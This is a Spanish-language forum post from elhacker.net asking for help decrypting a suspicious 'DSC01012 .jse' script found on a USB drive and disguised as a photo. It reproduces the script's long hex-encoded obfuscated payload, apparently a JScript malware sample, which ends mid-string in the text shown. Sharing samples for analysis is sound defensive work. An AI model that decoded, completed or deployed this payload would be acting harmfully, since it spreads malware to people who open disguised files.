[Ayuda] descifrando un virus

Foro de elhacker.net

Seguridad Informática

Análisis y Diseño de Malware (Moderador: fary)

[Ayuda] descifrando un virus

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2 3

Autor

Tema: [Ayuda] descifrando un virus (Leído 18,288 veces)

danny920825

Desconectado

Mensajes: 175

[Ayuda] descifrando un virus

« en: 11 Julio 2015, 17:04 pm »

Hola a todos, les traigo tarea por decirlo de alguna forma a aquellos especializados en el arte de la cryptografia. El punto es que encontre en mi memoria USB hace un par de dias un archivo con el icono de una foto y un nombre asi como
"DSC01012 .jse"
o sea, que estaban tratando de esconder la extension alargando el nombre. Eso me dio curiosidad y lo revise y me escontre con el codigo que les traigo hoy para ver si me ayudan a descifrarlo y conocer realmente que es lo que hace. Por cierto, mi cuñado si lo ejecuto y lo que hace al usuario es supuestamente abrir la foto del fondo de escritorio. Sin mas vueltas, aqui les dejo el codigo

Código

z="cfcdd4d6bc98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382aebecdc4828682cbcfc4c9c289a1c4828682c7c0aed4ce828682cfc0c8aabdc5828682c0becf828496bd98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382b2aebe828682cdc4cbcf89aec3828682c0c7c7828496ce98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382aec3c0828682c7c7899ccbcbc7c4828682bebccfc4cac9828496d2c798b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382b2bdc0c8aebecd828682c4cbcfc4c9c289aeb2bdc0c8a7828682cabebccfcacd828496bfbd98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf83829c9faa8286829f9d89aecfcd828682c0bcc8828496bfbd899ec3bccdaec0cf987db0ae889cae9ea4a47d96bfbd89afd4cbc0988d96be8e98bd89aecbc0bec4bcc7a1cac7bfc0cdce837daecfbccdcfd0cb7d8496c9cf919883bd89adc0c2adc0bcbf8382a3a6a7a8b7b7aeaaa1afb29cada0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ce7ba9afb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b79ed0cdcdc0c9cfb1c0cdcec4cac982849998919acfcdd0c095c1bcc7cec08496c5c4beca98bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b77d86bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b789c5cbc2b7b77d84867db7b79fc0c1bcd0c7cfa4becac9b7b77d8496c4beca987dc0d3cbc7cacdc0cd89c0d3c07d96c298b2aebecdc4cbcf89aebecdc4cbcfa1d0c7c7a9bcc8c096bfbc98c9c0d27b9fbccfc0838496bcc9ca98bfbc89c2c0cfb4c0bccd8384867d7d96c8c0ce98bfbc89c2c0cfa8cac9cfc3838496bfc4bc98bfbc89c2c0cf9fbccfc0838496c3cdbc988b96bcc9cfd198c9c0d27b9ccdcdbcd4837d7d8496cdc2c6987da3a69eb0b7b7aecac1cfd2bccdc0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ceb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b7add0c97d96d2c7c2987da3a69eb0b7b7aecac1cfd2bccdc0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ce7ba9afb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b7b2c4c9c7cac2cac9b7b7aec3c0c7c77d96c2c998c9c0d27b9ccdcdbcd4837da4a8a27d877da4a8a2ba7d877daba49e7d877d9fae9e7d877d9ea4a8a27d877da3aba4a87d877da4a89ca27d877d9fae9ea17d877d9fae9ea97d877d9f9ea4a87d877da4a87d877daba49eaf7d877dae9ca8ba7d8496cecb987d7d96c1cacd83cd988b96cd97948f96cd868684d6cecb86987d7b7d96d8c0d398c2c9b6a8bccfc389cdcad0c9bf83a8bccfc389cdbcc9bfcac88384858c8d84b886bcc9ca89ced0bdcecfcdc4c9c2838d878f84867d7d86c8c0ce86bfc4bc867d89a5aba27d86cecb867d89c5cec07d96c5c0d3987d7d96cfbcce987dc0d3cbc7cacdc0cd7d96c1ced598bc89a2c0cfa1c4c7c083c28489aec4d5c096d2cebe98b2aebecdc4cbcf89a1d0c7c7a9bcc8c096cecfc7987dc3cfcfcbce958a8ad2d2d289c2cacac2c7c089c0ce8a7ecad0cfcbd0cf98cec0bccdbec381cebec7c4c0c9cf98cbced488bcbd81cc98c1c4d1c0cdbfcac7c7d4867d96cecfcb98cecfc786c1ced596c4c183ce89a9bcc8c0aecbbcbec0838d918498987dadcabcc8c4c9c27d84d6cfcacf98bc89a2c0cfa1cac7bfc0cd83ce89a9bcc8c0aecbbcbec0838d918489abbccdcec0a9bcc8c0837da8c4becdcacecac1cf7d8489abbccfc38489abbccdc0c9cfa1cac7bfc0cd96d8c0c7cec0d6cfcacf98ce89a9bcc8c0aecbbcbec0838f8b8489abbccdcec0a9bcc8c083ce89a9bcc8c0aecbbcbec0838d91848489abbccfc396d8c9cf838496d8bebccfbec383c084d6d8cec1987d7d96c1d0c9becfc4cac97bc9cf8384d6cfcdd4d6be8c98ce89a9bcc8c0aecbbcbec0838d938489abbccdcec0a9bcc8c0837dc8c4becdcacecac1cf7d8496be8d98be8c89a2c0cfa1cac7bfc0cd89a4cfc0c8ce8384899ecad0c9cf96cdc198a8bccfc389cdcad0c9bf83a8bccfc389cdbcc9bfcac8838485be8d888c8496be8f98be8c89a2c0cfa1cac7bfc0cd89a4cfc0c8ce838489c4cfc0c883cdc18489abbccfc396c4c183bc89a1cac7bfc0cda0d3c4cecfce83be8f849898c1bcc7cec084d6be8f98bc89a2c0cfa1c4c7c083be8f8489abbccdc0c9cfa1cac7bfc0cd96d8d8bebccfbec383c084d6be8f98be8c89abbccfc396d8be9098a8bccfc389cdbcc9bfcac883848593868c867d7d96be9098be9089cdc0cbc7bcbec0837d897d877d7d8496cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a69eb0b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b79fc0c1bcd0c7cfa4becac9b7b77d87c5c4beca877dada0a2baaeb57d8496d8bebccfbec383c084d6d8cfcdd4d6c5cfd4cb98bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7c5cbc0c2c1c4c7c0b7b7a1cdc4c0c9bfc7d4afd4cbc0a9bcc8c07d8496bd89adc0c2b2cdc4cfc0837da3a69eb0b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b7a1cdc4c0c9bfc7d4afd4cbc0a9bcc8c07d87c5cfd4cb877dada0a2baa0b3ab9ca99fbaaeb57d8496d8bebccfbec383c084d6d8cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b79fc0c1bcd0c7cfa4becac9b7b77d87c5c4beca877dada0a2baaeb57d8496d8bebccfbec383c084d6d8cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b7a1cdc4c0c9bfc7d4afd4cbc0a9bcc8c07d87c5cfd4cb877dada0a2baa0b3ab9ca99fbaaeb57d8496d8bebccfbec383c084d6d8c4c183c289ced0bdcecfcdc4c9c283c289c7bccecfa4c9bfc0d3aac1837db7b77d84868c87c289c7c0c9c2cfc38489cfcaa7cad2c0cd9ebccec0838489cec0bccdbec3837d89c5cbc27d86cecb867d89c5cec07d847c98888c84d6cfcdd4d6c4c183bc89a1c4c7c0a0d3c4cecfce83c289ced0bdcecfcdc4c9c2838b87c289c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bd89cdd0c983827d8286c289ced0bdcecfcdc4c9c2838b87c289c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848486827d828496d8c0c7cec0d6d2cb98bd89adc0c2adc0bcbf837da3a69eb0b7b79ecac9cfcdcac77babbcc9c0c7b7b79fc0cec6cfcacbb7b7b2bcc7c7cbbccbc0cd7d8496c4c183d2cb89ced0bdcecfcdc4c9c283d2cb89c7bccecfa4c9bfc0d3aac1837db7b77d84868c87d2cb89c7c0c9c2cfc38498987dafcdbcc9cebecabfc0bfb2bcc7c7cbbccbc0cd7d84d6c5cbc2be98bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7c5cbc0c2c1c4c7c0b7b7cec3c0c7c7b7b7cacbc0c9b7b7becac8c8bcc9bfb7b77d8489cdc0cbc7bcbec0837d808c7d87d2cb8496bd89cdd0c983c5cbc2be8496d8c0c7cec0d6bd89cdd0c983827d8286d2cb86827d828496d8d8d8bebccfbec383c084d6d8cfcdd4d6cebe98d2c7899ecac9c9c0becfaec0cdd1c0cd83c9d0c7c7877b7dcdcacacfb7b7bfc0c1bcd0c7cf7d8496cdc298cebe89a2c0cf837daecfbfadc0c2abcdcad17d8496c898cdc289a8c0cfc3cabfceba89a4cfc0c8837da0c9d0c8b1bcc7d0c0ce7d8496cbc4c998c889a4c9abbccdbcc8c0cfc0cdce89aecbbcd2c9a4c9cecfbcc9bec0ba838496cdc698c9c0d27baabdc5c0becf838496cdc6b67da3a69eb07db898cdc6b67da3a6a0b4ba9eb0adada0a9afbab0aea0ad7db8988bd3938b8b8b8b8b8b8c96cdd198cdc6b6cdc2c689ced0bdcecfcd838b87cdc2c689c4c9bfc0d3aac1837db7b77d8484b896cbc4c989c39fc0c1a6c0d498cdd196cbc4c989ceaed0bda6c0d4a9bcc8c098cdc2c689ced0bdcecfcd83cdc2c689c4c9bfc0d3aac1837db7b77d847b867b8c8496cbcacf98cdc289a0d3c0bea8c0cfc3cabfba83c889a9bcc8c087cbc4c98496bcc698cbcacf89cea9bcc8c0ce89cfca9ccdcdbcd4838496c1cacd83c6c0d47bc4c97bbcc684d6cfcfce98bd89adc0c2adc0bcbf83cdc2c6867db7b77d86bcc6b6c6c0d4b884867d7d96c4c183cfcfce89cec0bccdbec3837d89c0d3c07d847c98888c84d6cfcfce8d98cfcfce89ced0bdcecfcdc4c9c2838b87cfcfce89cec0bccdbec3837d89c0d3c07d848496cfcfce8e98cfcfce8d89ced0bdcecfcdc4c9c283cfcfce8d89c7bccecfa4c9bfc0d3aac1837d957d84888c87cfcfce8d89c7c0c9c2cfc384867d89c0d3c07d96c4c183bc89a1c4c7c0a0d3c4cecfce83cfcfce8e849898cfcdd0c084d6c4beca98cfcfce8e96d8c4c183cfcfce8d89c4c9bfc0d3aac1837db7b77d847c98888c84d6cfcfce8d98cfcfce8d89ced0bdcecfcdc4c9c283cfcfce8d89c7bccecfa4c9bfc0d3aac1837db7b77d84868c87cfcfce8d89c7c0c9c2cfc38496d8cfbcce98cfcfce8d96d8d8d8bebccfbec383c084d6d8c4c183cfbcce89c4c9bfc0d3aac1837d7b7d847c98888c84d6cfbcce98cfbcce89ced0bdcecfcdc4c9c2838b87cfbcce89c4c9bfc0d3aac1837d7b7d848496d8c4c183cfbcce89c4c9bfc0d3aac1837d897d847c98888c84d6cfbcce98cfbcce89ced0bdcecfcdc4c9c2838b87cfbcce89c4c9bfc0d3aac1837d897d848496d8cfcdd4d6c9c0d2bf98c1ced596cac7bfbfc198bd89adc0c2adc0bcbf83d2c7c28496cac7bfbfc198cac7bfbfc189ced0bdcecfcdc4c9c283cac7bfbfc189c7bccecfa4c9bfc0d3aac183827d7b7d8284868e87cac7bfbfc189c7bccecfa4c9bfc0d3aac183827d82848496d8bebccfbec383c084d6cac7bfbfc198cec3bed0838496d8c4c183bc89a1c4c7c0a0d3c4cecfce83cac7bfbfc1849898cfcdd0c084d6be8f98bc89a2c0cfa1c4c7c083cac7bfbfc18489abbccdc0c9cfa1cac7bfc0cd96cac7bfbf98bc89a2c0cfa1c4c7c083cac7bfbfc18489cec4d5c096d8c0c7cec0d6cac7bfbf988b96cac7bfbfc198be8f867db7b77d86be9096d8c4c183c9c0d2bf9998cac7bfbf84d6c4c183bc89a1c4c7c0a0d3c4cecfce83cac7bfbfc1849898cfcdd0c084d6bc89a2c0cfa1c4c7c083cac7bfbfc184899ccfcfcdc4bdd0cfc0ce988b96d8bfbd89aacbc0c9838496cfcdd4d6bcd198a2c0cfaabdc5c0becf837dd2c4c9c8c2c8cfce95d6c4c8cbc0cdcecac9bccfc4cac9a7c0d1c0c798c4c8cbc0cdcecac9bccfc0d87cb7b7b7b789b7b7cdcacacfb7b7aec0bed0cdc4cfd49ec0c9cfc0cd7d8683c9cf919a828d82958282848496bcd1c498bcd189a0d3c0beacd0c0cdd4837daea0a7a09eaf7b857ba1adaaa87b9cc9cfc4b1c4cdd0ceabcdcabfd0becf7d877db2aca77d8496c9bcd1c498c9c0d27ba0c9d0c8c0cdbccfcacd83bcd1c48496bcc9cfd198c9c0d27b9ccdcdbcd4838496c1cacd83967cc9bcd1c489bccfa0c9bf838496c9bcd1c489c8cad1c0a9c0d3cf838484d6cabcd198c9bcd1c489c4cfc0c8838496bcc9cfd189cbd0cec383cabcd189bfc4cecbc7bcd4a9bcc8c08496d8d8bebccfbec383c084d6bcc9cfd198c9c0d27b9ccdcdbcd4837da99c9e7d8496d8cfcdd4d6d1c4be987d977d86bd89adc0c2adc0bcbf837da3a69eb0b7b7b1cac7bccfc4c7c07ba0c9d1c4cdcac9c8c0c9cfb7b7a7aaa2aaa9aea0adb1a0ad7d8489cdc0cbc7bcbec0837db7b7b7b77d877d7d84867d957d86bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ce7ba9afb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b7abcdcabfd0becfa9bcc8c07d84867d987d86ce89a9bcc8c0aecbbcbec0838f8b84867d957d86bcc9cfd1867d997d96d8bebccfbec383c084d6d1c4be987d7d96d8becabf98bec4838496c4c183becabf89cec0bccdbec383d1c4be849898888c8181cdbcbf7c988b84d6c9bfbc98d1c4be867d85858a7d96c3c4ce98becabf89cdc0cbc7bcbec0837d85858a7d87c9bfbc8496bfbd89b2cdc4cfc0afc0d3cf83c3c4ce8496d8c0c7cec0d6bfbd89b2cdc4cfc0afc0d3cf83becabf8496d8bfbd89aebcd1c0afcaa1c4c7c083cac7bfbfc1878d8496bfbd899ec7cacec0838496cfcdd4d6c4c183bc89a2c0cfa1c4c7c083cac7bfbfc18489aacbc0c99cceafc0d3cfaecfcdc0bcc8838c87888d8489adc0bcbf9cc7c7838489bec3bccd9ecabfc09ccf838b847c988c8d8d84d6bc899ecacbd4a1c4c7c083c287cac7bfbfc187cfcdd0c08496d8bc89a2c0cfa1c4c7c083cac7bfbfc184899ccfcfcdc4bdd0cfc0ce988d96d8bebccfbec383c084d6d8d2cec398be8f867db7b77d86cfbcce867d89c0d3c07d96cfcdd4d6bc899ecacbd4a1c4c7c083d2cebe87d2cec38496d8bebccfbec383c084d6d8bc89a2c0cfa1c4c7c083d2cec384899ccfcfcdc4bdd0cfc0ce988d96cfcdd4d6bfcdc298827d8286d2cec386827d7b7d8286cac7bfbfc186827d7b8a8aa095a5aebecdc4cbcf7b8a8a9d8296cec3bed0838496c0be98bd899ecdc0bccfc0aec3cacdcfbed0cf83be8e867db7b77d86cfbcce867d89c7c9c67d8496c0be89afbccdc2c0cfabbccfc398be8f867db7b77d86cfbcce867d89c0d3c07d96c0be899ccdc2d0c8c0c9cfce98827d8286cac7bfbfc186827d7b8a8aa095a5aebecdc4cbcf7b8a8a9d7b88c9ce8296c0be89a4becac9a7cabebccfc4cac998c4beca96c0be89aebcd1c0838496bd89adc0c2b2cdc4cfc083d2c7c287bfcdc28782ada0a2baaeb5828496b2aebecdc4cbcf89aec7c0c0cb83949494948496c4c183bd89adc0c2adc0bcbf83d2c7c2849898bfcdc284d6bc899fc0c7c0cfc0a1c4c7c083be8e867db7b77d86cfbcce867d89c7c9c67d8496d8d8bebccfbec383c084d6d8d8d8c0c7cec0d6cfcdd4d6c4c183b2aebecdc4cbcf899ccdc2d0c8c0c9cfce89c7c0c9c2cfc398988b84d6bd89cdd0c9837dc0d3cbc7cacdc0cd89c0d3c07d8496d8d8bebccfbec383c084d6d8cfcdd4d6c1bec1cb98c9c0d27b9ccdcdbcd4838496cfbec8bf98c9c0d27b9ccdcdbcd4838496c1cacd83cf988b96cf979496cf868684d6cfbec8bf89cbd0cec383cfcacf867db7b7af9e8d8b8c7d86cf867db7b7cfbec4c2c9cacdc089cfd3cf7d8496cfcdd4d6c1bec1cb89cbd0cec383ce89a9bcc8c0aecbbcbec0838e938489abbccdcec0a9bcc8c0837dafcacfbcc79ecac8c8bcc9bfc0cd8d8b8c7d86cf8489abbccfc3867db7b7afcacac7ceb7b7a8cad5c4c7c7bc7ba1c4cdc0c1cad3b7b7bfc0c1bcd0c7cfceb7b7cbcdcac1c4c7c07d8496d8bebccfbec383c084d6d8cfcdd4d6c1bec1cb89cbd0cec383ce89a9bcc8c0aecbbcbec0838f938489abbccdcec0a9bcc8c0837dafcacfbcc79ecac8c8bcc9bfc0cd8d8b8c7d86cf8489abbccfc3867db7b7afcacac7ceb7b7a8cad5c4c7c7bc7ba1c4cdc0c1cad3b7b7bfc0c1bcd0c7cfceb7b7cbcdcac1c4c7c07d8496d8bebccfbec383c084d6d8d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838e938489abbccdcec0a9bcc8c0837daf9e7bb0ab7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838f938489abbccdcec0a9bcc8c0837daf9e7bb0ab7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838d938489abbccdcec0a9bcc8c0837dc2c3c4cec7c0cd7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838d918489abbccdcec0a9bcc8c0837dc2c3c4cec7c0cd7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfbec8bf89cbd0cec3837dbe95b7b7cfcacfbcc7bec8bfb7b7cfbec4c2c9cacdc089cfd3cf7d8496c1cacd83cf988b96cf97cfbec8bf89c7c0c9c2cfc396cf868684d6c4c183bc89a1c4c7c0a0d3c4cecfce83cfbec8bfb6cfb889cdc0cbc7bcbec0837dcfbec4c2c9cacdc089cfd3cf7d877dd2c4c9bec8bf89c4c9c47d84849898cfcdd0c084d6cfcdd4d6bfbd89aacbc0c9838496c4c183bc89a1c4c7c0a0d3c4cecfce83cfbec8bfb6cfb8849898c1bcc7cec084d6cfcfc998bc899ecdc0bccfc0afc0d3cfa1c4c7c083cfbec8bfb6cfb887cfcdd0c08496cfcfc989b2cdc4cfc0837d858589858589c5cec07d8496cfcfc989bec7cacec0838496d8c4c2c7987d7d96cfcdd4d6bfbd89a7cabcbfa1cdcac8a1c4c7c083cfbec8bfb6cfb88496c4c2c798bfbd89adc0bcbfafc0d3cf96d8bebccfbec383c084d6d8bfbd899ec7cacec0838496c4c183c4c2c789c4c9bfc0d3aac1837d858589858589c5cec07d849898888c84d6bfbd89aacbc0c9838496bfbd89b2cdc4cfc0afc0d3cf83c4c2c7878c8496bfbd89b2cdc4cfc0afc0d3cf837d858589858589c5cec07d878c8496bc899fc0c7c0cfc0a1c4c7c083cfbec8bfb6cfb88496bfbd89aebcd1c0afcaa1c4c7c083cfbec8bfb6cfb88496bfbd899ec7cacec0838496d8d8bebccfbec383c084d6d8cfcdd4d6cfcacd98bc89aacbc0c9afc0d3cfa1c4c7c083bc89a2c0cfa1c4c7c083cfbec8bfb6cfb88489abbccdc0c9cfa1cac7bfc0cd867db7b7b2c4c9bec8bf89c4c9c47d878c87cfcdd0c0878b8496cfcabc98cfcacd89adc0bcbf9cc7c7838496c4c183cfcabc89cec0bccdbec3837da4c2c9cacdc0a7c4cecfa1c4c7c0a0c9bcbdc7c0bf988b7d847c98888c84d6cfcabc98cfcabc89cdc0cbc7bcbec0837da4c2c9cacdc0a7c4cecfa1c4c7c0a0c9bcbdc7c0bf988b7d877da4c2c9cacdc0a7c4cecfa1c4c7c0a0c9bcbdc7c0bf988c7d8496d8c4c183cfcabc89cec0bccdbec3837da4c2c9cacdc0a7c4cecfa1c4c7c0987d849898888c84d6cfcabc98cfcabc89cdc0cbc7bcbec0837db69ecac9c1c4c2d0cdbccfc4cac9b87d877db69ecac9c1c4c2d0cdbccfc4cac9b87d867db7c9a4c2c9cacdc0a7c4cecfa1c4c7c0987d86cfbec8bfb6cfb88496d8c4c183cfbec8bfb6cfb889cec0bccdbec3837daf9e8d8b8c7d847c98888c84d6c4c183cfcabc89cec0bccdbec3837d988589c5cec07d849898888c84d6c1c4c7cf98cfcabc89ced0bdcecfcdc4c9c283cfcabc89c7bccecfa4c9bfc0d3aac1837da1c4c7cfc0cd7d84869187cfcabc89c7bccecfa4c9bfc0d3aac1837d89c4becac9987d848496c0c9c198cfcabc89ced0bdcecfcdc4c9c283cfcabc89c7bccecfa4c9bfc0d3aac1837da1c4c7cfc0cd7d8487cfcabc89c7c0c9c2cfc38496c0c9c798c0c9c189ced0bdcecfcdc4c9c2838b87c0c9c189c4c9bfc0d3aac1837db7c97d84868c8496c1c7c998c9c0d27ba9d0c8bdc0cd83c1c4c7cf84868c96c1c4becac998cfcabc89ced0bdcecfcdc4c9c283cfcabc89cec0bccdbec3837da1c4c7cfc0cd8c8c89c4becac9987d84868c8f87cfcabc89c7c0c9c2cfc38496bfc4becac998c1c4becac989ced0bdcecfcdc4c9c2838b87c1c4becac989cec0bccdbec3837db7c97d848496cfcabc98cfcabc89cdc0cbc7bcbec083c0c9c787c0c9c7867db7c9a1c4c7cfc0cd7d86c1c7c9867d988589c5cec0b7c9a1c4c7cfc0cd7d86c1c7c9867d89c4becac9987d86bfc4becac9867db7c97d8496cfcabc98cfcabc89cdc0cbc7bcbec0837da1c4c7c0afc4cbb2c4c9bfcad2ce988c7d877da1c4c7c0afc4cbb2c4c9bfcad2ce988b7d8496d8d8cfcacd89bec7cacec0838496cfcad298bc89aacbc0c9afc0d3cfa1c4c7c083bc89a2c0cfa1c4c7c083cfbec8bfb6cfb88489abbccdc0c9cfa1cac7bfc0cd867db7b7b2c4c9bec8bf89c4c9c47d878d87cfcdd0c0878b8496cfcad289b2cdc4cfc083cfcabc8496cfcad289bec7cacec0838496d8bebccfbec383c084d6d8d8d8d8bebccfbec383c084d6d8cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a69eb0b7b7aecac1cfd2bccdc0b7b7a8c4becdcacecac1cfb7b7a4c9cfc0cdc9c0cf7ba0d3cbc7cacdc0cdb7b7a8bcc4c9b7b7aecfbccdcf7babbcc2c07d87cecfcb877dada0a2baaeb57d84d8bebccfbec383c084d6d8cfcdd4d6c4c183bc89a1cac7bfc0cda0d3c4cecfce83cfcacf867db7b7a8cad5c4c7c7bcb7b7a1c4cdc0c1cad3b7b7abcdcac1c4c7c0ce7d849898cfcdd0c084d6c1cbc198bc89a2c0cfa1cac7bfc0cd83cfcacf867db7b7a8cad5c4c7c7bcb7b7a1c4cdc0c1cad3b7b7abcdcac1c4c7c0ce7d8496cbc1c198c9c0d27ba0c9d0c8c0cdbccfcacd83c1cbc189aed0bda1cac7bfc0cdce8496c1cacd83967ccbc1c189bccfa0c9bf838496cbc1c189c8cad1c0a9c0d3cf838484d6cbc1ce98cbc1c189c4cfc0c88384867d7d96c4c183cbc1ce89cec0bccdbec3837d89bfc0c1bcd0c7cf7d847c98888c84d6c1bec1cb89cbd0cec383cbc1ce8496d8d8d8c1cacd83cc988b96cc97c1bec1cb89c7c0c9c2cfc396cc868684d6cfcdd4d6c4c183bc89a1c4c7c0a0d3c4cecfce83c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d849898cfcdd0c08496d6c1c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d878c8496c1c5ce98c1c5c189adc0bcbf9cc7c7838496c1c5c189bec7cacec0838496d0cecb9882d0cec0cdbacbcdc0c1837dbdcdcad2cec0cd89cecfbccdcfd0cb89c3cac8c0cbbcc2c07d878296c4c183c1c5ce89c4c9bfc0d3aac183d0cecb847c98888c84d6c1c5ce8c98c1c5ce89ced0bdcecfcdc4c9c283c1c5ce89c4c9bfc0d3aac183d0cecb84868e9287c1c5ce89c7c0c9c2cfc38496c1c5ce8d98c1c5ce8c89ced0bdcecfcdc4c9c2838b87c1c5ce8c89c4c9bfc0d3aac1838284968284868d8496c1c5ce8e98c1c5ce89cdc0cbc7bcbec083d0cecb86c1c5ce8d87d0cecb86827b7d8286cecfcb86827d8496828496d2c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d878d8496d2c5c189b2cdc4cfc083c1c5ce8e8496d8c0c7cec0d6d2c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d87938496d2c5c189b2cdc4cfc0a7c4c9c08382b7c98286d0cecb86827b7d8286cecfcb86827d8496828496d8d2c5c189bec7cacec0838496d8d8bebccfbec383c084d6d8d8d8bebccfbec383c084d6d8cfcdd4d6c2c1ce98ce89a9bcc8c0aecbbcbec0838d938489abbccdcec0a9bcc8c0837da2cacac2c7c07d8489abbccfc3867db7b79ec3cdcac8c0b7b7b0cec0cd7b9fbccfbcb7b79fc0c1bcd0c7cfb7b7abcdc0c1c0cdc0c9bec0ce7d96c4c183bc89a1c4c7c0a0d3c4cecfce83c2c1ce849898cfcdd0c084d6c2c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c2c1ce878c8496c2c5ce98c2c5c189adc0bcbf9cc7c7838496c2c5c189bec7cacec0838496c2c5cec998c2c5ce89c7c0c9c2cfc396d0cdce98827dd0cdc7cebacfcabacdc0cecfcacdc0bacac9bacecfbccdcfd0cb7d957bb68296cdcace98827dcdc0cecfcacdc0bacac9bacecfbccdcfd0cb7d958296cdcacec898827dcdc0cecfcacdc0bacac9bacecfbccdcfd0cbbac8c4c2cdbccfc0bf7d958296c4c183c2c5ce89c4c9bfc0d3aac183cecfc7849898888c84d6c4c183c2c5ce89c4c9bfc0d3aac183d0cdce847c98888c84d6c2c5ce8c98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183d0cdce84868e8c87c2c5cec98496c2c5ce8d98c2c5ce8c89ced0bdcecfcdc4c9c2838b87c2c5ce8c89c4c9bfc0d3aac1837db87d84868c8496c2c5ce8e98c2c5ce89cdc0cbc7bcbec083d0cdce86c2c5ce8d87d0cdce86827b7d8286cecfcb86827d877b8286c2c5ce8d8496d8c0c7cec0d6c2c5ce8c98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183cdcacec88487c2c5cec98496c2c5ce8d98c2c5ce8c89ced0bdcecfcdc4c9c2838b87c2c5ce8c89c4c9bfc0d3aac1837db7c97d84868c8496c2c5ce8e98c2c5ce89cdc0cbc7bcbec083c2c5ce8d87cdcacec886827bcfcdd0c087b7c9b7cf8286d0cdce86827b7d8286cecfcb86827d7bb8b7c9828496d8c2c5ce8f98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183cdcace8487c2c5cec98496c2c5ce9098c2c5ce8f89ced0bdcecfcdc4c9c2838b87c2c5ce8f89c4c9bfc0d3aac18382878284868c8496c2c5ce8e98c2c5ce8e89cdc0cbc7bcbec083c2c5ce9087cdcace86827b8f87828496d2c5c298bc89aacbc0c9afc0d3cfa1c4c7c083c2c1ce878d8496d2c5c289b2cdc4cfc083c2c5ce8e8496d2c5c289bec7cacec0838496d8c0c7cec0d6c1bfce98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183cecfc78487c2c5ce89c7c0c9c2cfc38496c1bfbe98c1bfce89ced0bdcecfcdc4c9c2838b87c1bfce89c4c9bfc0d3aac183827d82848496c2c5ce8f98c2c5ce89cdc0cbc7bcbec083c1bfbe87cecfcb8496d2c5c298bc89aacbc0c9afc0d3cfa1c4c7c083c2c1ce878d8496d2c5c289b2cdc4cfc083c2c5ce8f8496d2c5c289bec7cacec0838496d8d8d8bebccfbec383c084d6d8c8c6838496d8d8c1d0c9becfc4cac97bc8c68384d6b2aebecdc4cbcf89aec7c0c0cb838c8d8b8b8b8b8496cfcdd4d6be98c9c0d27ba0c9d0c8c0cdbccfcacd83bc899fcdc4d1c0ce8496c1cacd83967cbe89bccfa0c9bf838496be89c8cad1c0a9c0d3cf838484d6cfc4cbcabfc4cebeca98be89c4cfc0c88384899fcdc4d1c0afd4cbc096ced2c4cfbec383cfc4cbcabfc4cebeca84d6bebccec07b8c95bebccec07b8e95c4c183be89c4cfc0c883847c987d9c957d7b81817bbe89c4cfc0c883847c987d9d957d84d6cfcdd4d6cec198bc89a2c0cfa1cac7bfc0cd83cbc083be89c4cfc0c88384867db7b77d848496cfc2c198c9c0d27ba0c9d0c8c0cdbccfcacd83cec189c1c4c7c0ce8496c1cacd83967ccfc2c189bccfa0c9bf838496cfc2c189c8cad1c0a9c0d3cf838484d6cecfc198cfc2c189c4cfc0c88384867d7d96c4c183cecfc189c